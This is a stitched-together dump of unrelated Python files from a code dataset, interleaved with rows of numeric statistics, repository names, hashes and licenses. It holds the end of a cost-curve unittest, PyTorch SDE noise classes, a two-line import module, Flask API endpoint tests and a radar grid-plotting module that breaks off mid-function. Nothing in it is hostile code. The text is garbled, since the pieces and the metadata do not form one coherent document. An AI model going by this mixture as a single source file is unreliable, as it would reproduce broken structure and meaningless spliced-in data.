        """A range entirely above the curve extrapolates the last segment."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=100, p_max=110, gen_name='foo', t=None)
        expected_values = [(100, 588), (110, 678)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmin_greater_than_last_point2(self):
        """p_min == p_max above the curve extrapolates a single point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=100, p_max=100, gen_name='foo', t=None)
        expected_values = [(100, 588)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmin_is_last_point(self):
        """p_min exactly at the last breakpoint extrapolates above it."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=90, p_max=110, gen_name='foo', t=None)
        expected_values = [(90, 498), (110, 678)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmin_is_last_point2(self):
        """p_min == p_max at the last breakpoint yields that one point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=90, p_max=90, gen_name='foo', t=None)
        expected_values = [(90, 498)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pw_single_point_raises_value_error(self):
        """A one-point curve cannot be extended: any mismatch with
        p_min/p_max is an error."""
        curve = example_pw_curve()
        curve = dict()
        curve['data_type'] = 'cost_curve'
        curve['cost_curve_type'] = 'piecewise'
        curve['values'] = [(40, 128)]
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=30, p_max=30, gen_name='foo', t=None)
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=30, p_max=40, gen_name='foo', t=None)
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=30, p_max=50, gen_name='foo', t=None)
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=40, p_max=50, gen_name='foo', t=None)
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=45, p_max=50, gen_name='foo', t=None)

    def test_poly_simple(self):
        """A convex quadratic polynomial passes through, copied."""
        curve = example_poly_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=15, p_max=85, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, curve['values'])
        self.assertIsNot(cleaned_values, curve['values'])

    def test_poly_nonconvex(self):
        """A negative quadratic coefficient (non-convex) is rejected."""
        curve = example_poly_curve()
        curve['values'][2] = -1
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=15, p_max=85, gen_name='foo', t=None)

    def test_poly_cubic(self):
        """A cubic term (degree > 2) is rejected."""
        curve = example_poly_curve()
        curve['values'][3] = 1
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=15, p_max=85, gen_name='foo', t=None)
| 58.173913
| 202
| 0.403251
| 2,165
| 26,760
| 4.617552
| 0.06836
| 0.118035
| 0.102031
| 0.082825
| 0.927078
| 0.913574
| 0.903971
| 0.884765
| 0.879964
| 0.86676
| 0
| 0.029279
| 0.529036
| 26,760
| 459
| 203
| 58.300654
| 0.763945
| 0.003774
| 0
| 0.8
| 0
| 0.009639
| 0.064195
| 0.014783
| 0
| 0
| 0
| 0
| 0.151807
| 1
| 0.077108
| false
| 0
| 0.009639
| 0.00241
| 0.096386
| 0.028916
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13ee560085ba5c852677a29b3babe39e4385de9c
| 876
|
py
|
Python
|
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | 5
|
2020-06-28T07:15:35.000Z
|
2022-01-20T01:52:31.000Z
|
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | null | null | null |
models/diffusion_fn.py
|
xuanqing94/NeuralSDE
|
f3511799cfc9c3d6b95ff9bcb07563df88715e0c
|
[
"MIT"
] | null | null | null |
# Different noise types
# TODO implement jump-duffusion noises
import torch
import torch.nn as nn
class MultiplicativeNoise(nn.Module):
    """State-dependent (multiplicative) diffusion: g(t, x) = sigma * x."""

    def __init__(self, sigma):
        super().__init__()
        # A buffer (not a Parameter): sigma follows .to()/state_dict but
        # is not trained.
        self.register_buffer("sigma", torch.tensor(sigma, dtype=torch.float))

    def diffusion(self, t, x):
        """Diffusion coefficient at state x; the time t is unused."""
        return x * self.sigma

    def dif_diffusion(self, t, x):
        """Derivative of the diffusion coefficient with respect to x."""
        return self.sigma
class AdditiveNoise(nn.Module):
    """State-independent (additive) diffusion: g(t, x) = sigma."""

    def __init__(self, sigma):
        super().__init__()
        # Stored as a buffer so sigma follows device moves and state_dict.
        self.register_buffer("sigma", torch.tensor(sigma, dtype=torch.float))

    def diffusion(self, t, x):
        """Constant diffusion coefficient; ignores both t and x."""
        return self.sigma

    def dif_diffusion(self, t, x):
        """Derivative of a constant w.r.t. x is zero (returned as int 0)."""
        return 0
class NoNoise(nn.Module):
    """Degenerate diffusion g(t, x) = 0, reducing the SDE to an ODE.

    sigma is accepted (and ignored) so every noise class shares the same
    constructor signature.
    """

    def __init__(self, sigma):
        super().__init__()

    def diffusion(self, t, x):
        """Zero diffusion coefficient."""
        return 0.0

    def dif_diffusion(self, t, x):
        """Derivative of zero is zero."""
        return 0.0
| 21.365854
| 77
| 0.633562
| 116
| 876
| 4.534483
| 0.284483
| 0.102662
| 0.159696
| 0.171103
| 0.745247
| 0.745247
| 0.739544
| 0.625475
| 0.456274
| 0.456274
| 0
| 0.007599
| 0.248858
| 876
| 40
| 78
| 21.9
| 0.791793
| 0.06621
| 0
| 0.72
| 0
| 0
| 0.01227
| 0
| 0
| 0
| 0
| 0.025
| 0
| 1
| 0.36
| false
| 0
| 0.08
| 0.24
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b91609c3c89af1548156f672b5b0285d5b8af918
| 110
|
py
|
Python
|
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.characters.racialclass.bugbear import Bugbear
from bflib.characters.racialclass.gnoll import Gnoll
| 36.666667
| 56
| 0.872727
| 14
| 110
| 6.857143
| 0.5
| 0.1875
| 0.395833
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 2
| 57
| 55
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b920ece0fcbad6e7aefdcfc4880354efdd0f5bae
| 17,792
|
py
|
Python
|
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | null | null | null |
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | 1
|
2019-10-21T15:01:31.000Z
|
2019-10-21T15:01:31.000Z
|
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | 2
|
2018-10-04T02:37:29.000Z
|
2018-11-01T08:29:26.000Z
|
import unittest
import json
from apicore.app import app
from apicore.models.db import DBhandler
class APITestCase(unittest.TestCase):
    """Unit testing class for the API endpoints.

    The register/login/post-question boilerplate that was previously
    repeated verbatim in every test method is factored into private
    helpers; each test method keeps its original name and assertions.
    """

    def setUp(self):
        """Create a test client, a fresh database table and fixture data."""
        self.app = app
        self.app.config['TESTING'] = True
        self.db_handler = DBhandler(host="localhost", database="",
                                    user="postgres", password="sudo")
        self.db_handler.create_table()
        self.client = self.app.test_client()
        self.user = {
            'username': 'tester',
            'password': 'password'
        }
        self.question = {
            "author": "Tester",
            "title": "I am getting errors when i run pytest",
            "body": "I am having issues with the code i \
            have written i need a fix for this"
        }
        self.token = ''

    # ------------------------------------------------------------------
    # Private helpers
    # ------------------------------------------------------------------
    def _post_json(self, url, payload, headers=None):
        """POST *payload* as JSON to *url*, optionally with *headers*."""
        return self.client.post(url,
                                data=json.dumps(payload),
                                content_type='application/json',
                                headers=headers)

    def _register(self):
        """Register the fixture user and assert the API confirms it."""
        response = self._post_json('api/v2/auth/register', self.user)
        self.assertEqual(response.status_code, 201)
        self.assertIn('user is successfully registered', str(response.data))
        return response

    def _login(self):
        """Log the fixture user in, store the JWT and assert success."""
        response = self._post_json('api/v2/auth/login', self.user)
        self.assertEqual(response.status_code, 201)
        self.assertIn('Token created', str(response.data))
        self.token = response.json['access_token']
        return response

    def _auth_headers(self):
        """Authorization header carrying the token obtained by _login()."""
        return {'Authorization': 'Bearer {}'.format(self.token)}

    def _post_question(self, question=None):
        """Create *question* (default: the fixture one) and assert 201."""
        res = self._post_json('/api/v2/questions',
                              question if question is not None
                              else self.question,
                              headers=self._auth_headers())
        self.assertEqual(res.status_code, 201)
        return res

    def _post_answer(self, answer):
        """Post *answer* to question 1 and assert it was created."""
        res = self._post_json('/api/v2/questions/1/answers', answer,
                              headers=self._auth_headers())
        self.assertEqual(res.status_code, 201)
        return res

    # ------------------------------------------------------------------
    # Tests
    # ------------------------------------------------------------------
    def test_user_register(self):
        ''' Tests whether a given user can register through the app '''
        self._register()

    def test_user_login(self):
        ''' Tests whether a given user can register through the app '''
        self._register()
        self._login()

    def test_acces_endpoint_without_token(self):
        ''' Tests a user accesing a protected endpoint without jwt '''
        res = self._post_json('/api/v2/questions', self.question)
        self.assertEqual(res.status_code, 401)
        self.assertIn('Missing Authorization Header', str(res.data))

    def test_can_get_all_questions(self):
        '''Test can get a question with jwt auth '''
        self._register()
        self._login()
        rv = self.client.get('api/v2/questions',
                             content_type='application/json',
                             headers=self._auth_headers())
        self.assertEqual(rv.status_code, 200)

    def test_can_create_a_question(self):
        '''Test can create a queston '''
        self._register()
        self._login()
        self._post_question()

    def test_can_get_a_question(self):
        '''Test can get a queston '''
        self._register()
        self._login()
        self._post_question()
        rv = self.client.get('api/v2/questions/1',
                             content_type='application/json',
                             headers=self._auth_headers())
        self.assertEqual(rv.status_code, 200)
        self.assertIn('I am getting errors when i run pytest', str(rv.data))

    def test_can_get_many_questions(self):
        '''Test can get many questons '''
        question1 = {
            "author": "Tester",
            "title": "How do i work with JWT",
            "body": "I am writing unitests and they dont work \
            i need a fix for this. Thanks"
        }
        question2 = {
            "author": "Tester",
            "title": "I am facing merge conflicts",
            "body": "How do i use version control and git \
            to solve this. Thanks"
        }
        self._register()
        self._login()
        self._post_question()
        self._post_question()
        self._post_question(question1)
        self._post_question(question2)
        rv = self.client.get('api/v2/questions',
                             content_type='application/json',
                             headers=self._auth_headers())
        self.assertEqual(rv.status_code, 200)
        self.assertIn(
            'I am getting errors when i run pytest', str(rv.data))
        self.assertIn('How do i work with JWT', str(rv.data))
        self.assertIn('I am facing merge conflicts', str(rv.data))

    def test_can_create_answer_to_question(self):
        '''Test can create an answer to question '''
        self._register()
        self._login()
        self._post_question()
        answer = {"body": "Use windows because its cool",
                  'accept_status': False}
        self._post_answer(answer)

    def test_can_get_user_profile(self):
        '''Test can create an answer to question '''
        self._register()
        self._login()
        self._post_question()
        answer = {"body": "Use windows because its cool",
                  'accept_status': False}
        self._post_answer(answer)
        rv = self.client.get('api/v2/profile',
                             content_type='application/json',
                             headers=self._auth_headers())
        self.assertEqual(rv.status_code, 200)
        rv_reponse = rv.json
        self.assertEqual('tester', rv_reponse['username'])
        self.assertEqual("I am getting errors when i run pytest",
                         rv_reponse['recent'][0])

    def test_can_update_answer_to_question(self):
        '''Test can create an answer to question '''
        self._register()
        self._login()
        self._post_question()
        answer = {"body": "Use windows because its cool",
                  'accept_status': False}
        self._post_answer(answer)
        answer_update = {"body": "Use windows because its cool",
                         'accept_status': True}
        rv = self.client.put('api/v2/questions/1/answers/2',
                             data=json.dumps(answer_update),
                             content_type='application/json',
                             headers=self._auth_headers())
        self.assertEqual(rv.status_code, 200)
        self.assertEqual("Answer status updated", rv.json['message'])

    def test_delete_question(self):
        ''' Test can delete a question '''
        self._register()
        self._login()
        self._post_question()
        rv = self.client.delete('api/v2/questions/1',
                                content_type='application/json',
                                headers=self._auth_headers())
        self.assertEqual(rv.status_code, 202)

    def tearDown(self):
        """Drop all tables so every test starts from a clean database."""
        print('-----Tearing down ------------')
        self.db_handler.drop_table('users', 'answers', 'questions')
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| 47.068783
| 76
| 0.494998
| 1,656
| 17,792
| 5.218599
| 0.095411
| 0.0729
| 0.099283
| 0.117334
| 0.866003
| 0.832909
| 0.820181
| 0.820181
| 0.808609
| 0.808609
| 0
| 0.015759
| 0.397257
| 17,792
| 377
| 77
| 47.193634
| 0.790097
| 0.026641
| 0
| 0.710692
| 0
| 0
| 0.172618
| 0.006318
| 0
| 0
| 0
| 0
| 0.207547
| 1
| 0.040881
| false
| 0.006289
| 0.012579
| 0
| 0.056604
| 0.003145
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b925f00ee06b14dc0c86f4ba1871c2bf3da3d491
| 16,970
|
py
|
Python
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 41
|
2016-12-01T08:46:06.000Z
|
2021-06-24T21:14:33.000Z
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 42
|
2017-02-23T14:52:49.000Z
|
2021-02-01T10:43:52.000Z
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 21
|
2016-08-25T15:02:12.000Z
|
2021-05-27T04:09:40.000Z
|
"""
pyrad.graph.plots_grid
======================
Functions to plot data in a Cartesian grid format
.. autosummary::
:toctree: generated/
plot_surface
plot_surface_contour
plot_latitude_slice
plot_longitude_slice
plot_latlon_slice
"""
from warnings import warn
import numpy as np
# Optional dependency: record whether cartopy is importable so the plotting
# functions below can fall back to basemap when it is missing.
try:
    import cartopy
    _CARTOPY_AVAILABLE = True
except ImportError:
    _CARTOPY_AVAILABLE = False
import matplotlib as mpl
# Non-interactive backend so figures can be rendered headless (no display).
mpl.use('Agg')
# Increase a bit font size
mpl.rcParams.update({'font.size': 16})
mpl.rcParams.update({'font.family': "sans-serif"})
import matplotlib.pyplot as plt
import pyart
from .plots_aux import get_norm
def plot_surface(grid, field_name, level, prdcfg, fname_list, titl=None,
                 alpha=None, ax=None, fig=None, display=None, save_fig=True,
                 use_basemap=False):
    """
    plots a surface from gridded data

    Parameters
    ----------
    grid : Grid object
        object containing the gridded data to plot
    field_name : str
        name of the radar field to plot
    level : int
        level index
    prdcfg : dict
        dictionary containing the product configuration
    fname_list : list of str
        list of names of the files where to store the plot
    titl : str
        Plot title
    alpha : float or None
        Set the alpha transparency of the grid plot. Useful for
        overplotting radar over other datasets.
    ax : Axis
        Axis to plot on. if fig is None a new axis will be created
    fig : Figure
        Figure to add the colorbar to. If none a new figure will be created
    display : GridMapDisplay object
        The display used
    save_fig : bool
        if true save the figure. If false it does not close the plot and
        returns the handle to the figure
    use_basemap : Bool
        If true uses basemap, otherwise uses cartopy.

    Returns
    -------
    fname_list : list of str or
    fig, ax, display : tupple
        list of names of the saved plots or handle of the figure an axes

    """
    dpi = prdcfg['gridMapImageConfig'].get('dpi', 72)
    vmin = prdcfg.get('vmin', None)
    vmax = prdcfg.get('vmax', None)
    norm, ticks, ticklabs = get_norm(field_name)
    xsize = prdcfg['gridMapImageConfig']['xsize']
    ysize = prdcfg['gridMapImageConfig']['ysize']
    lonstep = prdcfg['gridMapImageConfig'].get('lonstep', 0.5)
    latstep = prdcfg['gridMapImageConfig'].get('latstep', 0.5)
    min_lon = prdcfg['gridMapImageConfig'].get('lonmin', 2.5)
    max_lon = prdcfg['gridMapImageConfig'].get('lonmax', 12.5)
    min_lat = prdcfg['gridMapImageConfig'].get('latmin', 43.5)
    max_lat = prdcfg['gridMapImageConfig'].get('latmax', 49.5)
    lon_lines = np.arange(np.floor(min_lon), np.ceil(max_lon)+1, lonstep)
    lat_lines = np.arange(np.floor(min_lat), np.ceil(max_lat)+1, latstep)
    if fig is None:
        fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
        ax = fig.add_subplot(111)
        # Bug fix: fall back to basemap when cartopy is not installed,
        # consistent with plot_surface_contour (previously this branch
        # checked use_basemap only and would crash without cartopy).
        if use_basemap or not _CARTOPY_AVAILABLE:
            resolution = prdcfg['gridMapImageConfig'].get('mapres', 'l')
            if resolution not in ('c', 'l', 'i', 'h', 'f'):
                warn('Unknown map resolution: '+resolution)
                resolution = 'l'
            # coastline simplification threshold paired with each resolution
            area_thresh = {
                'c': 10000, 'l': 1000, 'i': 100, 'h': 10, 'f': 1}[resolution]
            display = pyart.graph.GridMapDisplayBasemap(grid)
            display.plot_basemap(
                lat_lines=lat_lines, lon_lines=lon_lines,
                resolution=resolution, area_thresh=area_thresh,
                auto_range=False, min_lon=min_lon, max_lon=max_lon,
                min_lat=min_lat, max_lat=max_lat, ax=ax)
            display.plot_grid(
                field_name, level=level, norm=norm, ticks=ticks, title=titl,
                ticklabs=ticklabs, vmin=vmin, vmax=vmax, alpha=alpha, ax=ax,
                fig=fig)
        else:
            resolution = prdcfg['gridMapImageConfig'].get('mapres', '110m')
            # Map from basemap to cartopy notation
            if resolution == 'l':
                resolution = '110m'
            elif resolution == 'i':
                resolution = '50m'
            elif resolution == 'h':
                resolution = '10m'
            if resolution not in ('110m', '50m', '10m'):
                warn('Unknown map resolution: '+resolution)
                resolution = '110m'
            background_zoom = prdcfg['gridMapImageConfig'].get(
                'background_zoom', 8)
            display = pyart.graph.GridMapDisplay(grid)
            fig, ax = display.plot_grid(
                field_name, level=level, norm=norm, ticks=ticks,
                ticklabs=ticklabs, resolution=resolution,
                background_zoom=background_zoom, lat_lines=lat_lines,
                lon_lines=lon_lines,
                maps_list=prdcfg['gridMapImageConfig']['maps'],
                vmin=vmin, vmax=vmax, alpha=alpha, title=titl, ax=ax, fig=fig)
            ax.set_extent([min_lon, max_lon, min_lat, max_lat])
            # display.plot_crosshairs(lon=lon, lat=lat)
    else:
        # Reusing a caller-supplied figure/axis: the display type was
        # chosen by the first call, so apply the same fallback logic here.
        if use_basemap or not _CARTOPY_AVAILABLE:
            display.plot_grid(
                field_name, level=level, norm=norm, ticks=ticks,
                lat_lines=lat_lines, lon_lines=lon_lines, title=titl,
                ticklabs=ticklabs, colorbar_flag=False, vmin=vmin, vmax=vmax,
                alpha=alpha, ax=ax, fig=fig)
        else:
            fig, ax = display.plot_grid(
                field_name, level=level, norm=norm, ticks=ticks,
                lat_lines=lat_lines, lon_lines=lon_lines, ticklabs=ticklabs,
                colorbar_flag=False, embelish=False, vmin=vmin, vmax=vmax,
                alpha=alpha, title=titl, ax=ax, fig=fig)
    if save_fig:
        for fname in fname_list:
            fig.savefig(fname, dpi=dpi)
        plt.close(fig)
        return fname_list
    return (fig, ax, display)
def plot_surface_contour(grid, field_name, level, prdcfg, fname_list,
                         contour_values=None, linewidths=1.5, colors='k',
                         ax=None, fig=None, display=None, save_fig=True,
                         use_basemap=False):
    """
    plots a contour plot from gridded data

    Parameters
    ----------
    grid : Grid object
        object containing the gridded data to plot
    field_name : str
        name of the radar field to plot
    level : int
        level index
    prdcfg : dict
        dictionary containing the product configuration
    fname_list : list of str
        list of names of the files where to store the plot
    contour_values : float array
        list of contours to plot
    linewidths : float
        width of the contour lines
    colors : color string or sequence of colors
        The contour colours
    ax : Axis
        Axis to plot on. if fig is None a new axis will be created
    fig : Figure
        Figure to add the colorbar to. If none a new figure will be created
    display : GridMapDisplay object
        The display used
    save_fig : bool
        if true save the figure if false it does not close the plot and
        returns the handle to the figure
    use_basemap : Bool
        If true uses basemap, otherwise uses cartopy.

    Returns
    -------
    fname_list : list of str or
    fig, ax : tupple
        list of names of the saved plots or handle of the figure an axes

    """
    # get contour intervals
    if contour_values is None:
        field_dict = pyart.config.get_metadata(field_name)
        if 'boundaries' in field_dict:
            vmin = field_dict['boundaries'][0]
            vmax = field_dict['boundaries'][-1]
            num = len(field_dict['boundaries'])
        else:
            vmin, vmax = pyart.config.get_field_limits(field_name)
            num = 10
        contour_values = np.linspace(vmin, vmax, num=num)
    dpi = prdcfg['gridMapImageConfig'].get('dpi', 72)
    # Bug fix: the geographic limits below were previously computed only
    # inside the `fig is None` branch, so the ax.set_extent() call further
    # down raised NameError when a caller-supplied cartopy figure was used.
    # They are now computed unconditionally.
    lonstep = prdcfg['gridMapImageConfig'].get('lonstep', 0.5)
    latstep = prdcfg['gridMapImageConfig'].get('latstep', 0.5)
    min_lon = prdcfg['gridMapImageConfig'].get('lonmin', 2.5)
    max_lon = prdcfg['gridMapImageConfig'].get('lonmax', 12.5)
    min_lat = prdcfg['gridMapImageConfig'].get('latmin', 43.5)
    max_lat = prdcfg['gridMapImageConfig'].get('latmax', 49.5)
    lon_lines = np.arange(np.floor(min_lon), np.ceil(max_lon)+1, lonstep)
    lat_lines = np.arange(np.floor(min_lat), np.ceil(max_lat)+1, latstep)
    if fig is None:
        xsize = prdcfg['gridMapImageConfig']['xsize']
        ysize = prdcfg['gridMapImageConfig']['ysize']
        fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
        ax = fig.add_subplot(111)
        if use_basemap or not _CARTOPY_AVAILABLE:
            resolution = prdcfg['gridMapImageConfig'].get('mapres', 'l')
            if resolution not in ('c', 'l', 'i', 'h', 'f'):
                warn('Unknown map resolution: '+resolution)
                resolution = 'l'
            # coastline simplification threshold paired with each resolution
            area_thresh = {
                'c': 10000, 'l': 1000, 'i': 100, 'h': 10, 'f': 1}[resolution]
            display = pyart.graph.GridMapDisplayBasemap(grid)
            display.plot_basemap(
                lat_lines=lat_lines, lon_lines=lon_lines,
                resolution=resolution, auto_range=False,
                area_thresh=area_thresh, min_lon=min_lon, max_lon=max_lon,
                min_lat=min_lat, max_lat=max_lat, ax=ax)
            lons, lats = grid.get_point_longitude_latitude(edges=False)
            data = grid.fields[field_name]['data'][level, :, :]
            basemap = display.get_basemap()
            basemap.contour(
                lons, lats, data, contour_values, colors=colors,
                linewidths=linewidths, latlon=True)
            ax.set_title(display.generate_grid_title(field_name, level))
        else:
            resolution = prdcfg['gridMapImageConfig'].get('mapres', '110m')
            # Map from basemap to cartopy notation
            if resolution == 'l':
                resolution = '110m'
            elif resolution == 'i':
                resolution = '50m'
            elif resolution == 'h':
                resolution = '10m'
            if resolution not in ('110m', '50m', '10m'):
                warn('Unknown map resolution: '+resolution)
                resolution = '110m'
            background_zoom = prdcfg['gridMapImageConfig'].get(
                'background_zoom', 8)
            display = pyart.graph.GridMapDisplay(grid)
            fig, ax = display.plot_grid_contour(
                field_name, level=level, ax=ax, fig=fig, lat_lines=lat_lines,
                lon_lines=lon_lines, contour_values=contour_values,
                linewidths=linewidths, colors=colors, resolution=resolution,
                background_zoom=background_zoom,
                maps_list=prdcfg['gridMapImageConfig']['maps'])
    else:
        if use_basemap or not _CARTOPY_AVAILABLE:
            lons, lats = grid.get_point_longitude_latitude(edges=False)
            data = grid.fields[field_name]['data'][level, :, :]
            basemap = display.get_basemap()
            basemap.contour(
                lons, lats, data, contour_values, colors=colors,
                linewidths=linewidths, latlon=True)
        else:
            lons, lats = grid.get_point_longitude_latitude(edges=False)
            data = grid.fields[field_name]['data'][level, :, :]
            ax.contour(
                lons, lats, data, contour_values, colors=colors,
                linewidths=linewidths, transform=cartopy.crs.PlateCarree())
            ax.set_extent([min_lon, max_lon, min_lat, max_lat])
    if save_fig:
        for fname in fname_list:
            fig.savefig(fname, dpi=dpi)
        plt.close(fig)
        return fname_list
    return (fig, ax)
def plot_latitude_slice(grid, field_name, lon, lat, prdcfg, fname_list):
    """
    plots a latitude slice from gridded data

    Parameters
    ----------
    grid : Grid object
        object containing the gridded data to plot
    field_name : str
        name of the radar field to plot
    lon, lat : float
        coordinates of the slice to plot
    prdcfg : dict
        dictionary containing the product configuration
    fname_list : list of str
        list of names of the files where to store the plot

    Returns
    -------
    fname_list : list of str
        list of names of the created plots

    """
    img_cfg = prdcfg['rhiImageConfig']
    dpi = img_cfg.get('dpi', 72)
    norm, ticks, ticklabs = get_norm(field_name)
    fig = plt.figure(
        figsize=[img_cfg.get('xsize', 10.), img_cfg.get('ysize', 5.)],
        dpi=dpi)
    ax = fig.add_subplot(111, aspect='equal')
    display = pyart.graph.GridMapDisplay(grid)
    display.plot_latitude_slice(
        field_name, lon=lon, lat=lat, norm=norm, colorbar_orient='horizontal',
        ticks=ticks, ticklabs=ticklabs, ax=ax, fig=fig)
    # None limits leave the corresponding axis bound to autoscaling.
    ax.set_xlim([img_cfg.get('xmin', None), img_cfg.get('xmax', None)])
    ax.set_ylim([img_cfg.get('ymin', None), img_cfg.get('ymax', None)])
    for fname in fname_list:
        fig.savefig(fname, dpi=dpi)
    plt.close(fig)
def plot_longitude_slice(grid, field_name, lon, lat, prdcfg, fname_list):
    """
    plots a longitude slice from gridded data

    Parameters
    ----------
    grid : Grid object
        object containing the gridded data to plot
    field_name : str
        name of the radar field to plot
    lon, lat : float
        coordinates of the slice to plot
    prdcfg : dict
        dictionary containing the product configuration
    fname_list : list of str
        list of names of the files where to store the plot

    Returns
    -------
    fname_list : list of str
        list of names of the created plots

    """
    img_cfg = prdcfg['rhiImageConfig']
    dpi = img_cfg.get('dpi', 72)
    norm, ticks, ticklabs = get_norm(field_name)
    fig = plt.figure(
        figsize=[img_cfg.get('xsize', 10.), img_cfg.get('ysize', 5.)],
        dpi=dpi)
    ax = fig.add_subplot(111, aspect='equal')
    display = pyart.graph.GridMapDisplay(grid)
    display.plot_longitude_slice(
        field_name, lon=lon, lat=lat, norm=norm, colorbar_orient='horizontal',
        ticks=ticks, ticklabs=ticklabs, ax=ax, fig=fig)
    # None limits leave the corresponding axis bound to autoscaling.
    ax.set_xlim([img_cfg.get('xmin', None), img_cfg.get('xmax', None)])
    ax.set_ylim([img_cfg.get('ymin', None), img_cfg.get('ymax', None)])
    for fname in fname_list:
        fig.savefig(fname, dpi=dpi)
    plt.close(fig)
def plot_latlon_slice(grid, field_name, coord1, coord2, prdcfg, fname_list):
    """
    plots a croos section crossing two points in the grid

    Parameters
    ----------
    grid : Grid object
        object containing the gridded data to plot
    field_name : str
        name of the radar field to plot
    coord1 : tupple of floats
        lat, lon of the first point
    coord2 : tupple of floats
        lat, lon of the second point
    prdcfg : dict
        dictionary containing the product configuration
    fname_list : list of str
        list of names of the files where to store the plot

    Returns
    -------
    fname_list : list of str
        list of names of the created plots

    """
    img_cfg = prdcfg['rhiImageConfig']
    dpi = img_cfg.get('dpi', 72)
    norm, ticks, ticklabs = get_norm(field_name)
    fig = plt.figure(
